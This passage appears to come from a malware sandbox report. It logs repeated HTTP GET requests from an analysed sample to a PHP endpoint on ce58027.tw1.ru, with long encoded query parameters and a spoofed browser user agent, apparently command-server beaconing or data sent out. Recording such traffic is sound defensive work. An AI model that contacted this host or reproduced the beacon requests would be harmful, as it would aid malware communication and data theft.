NJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET 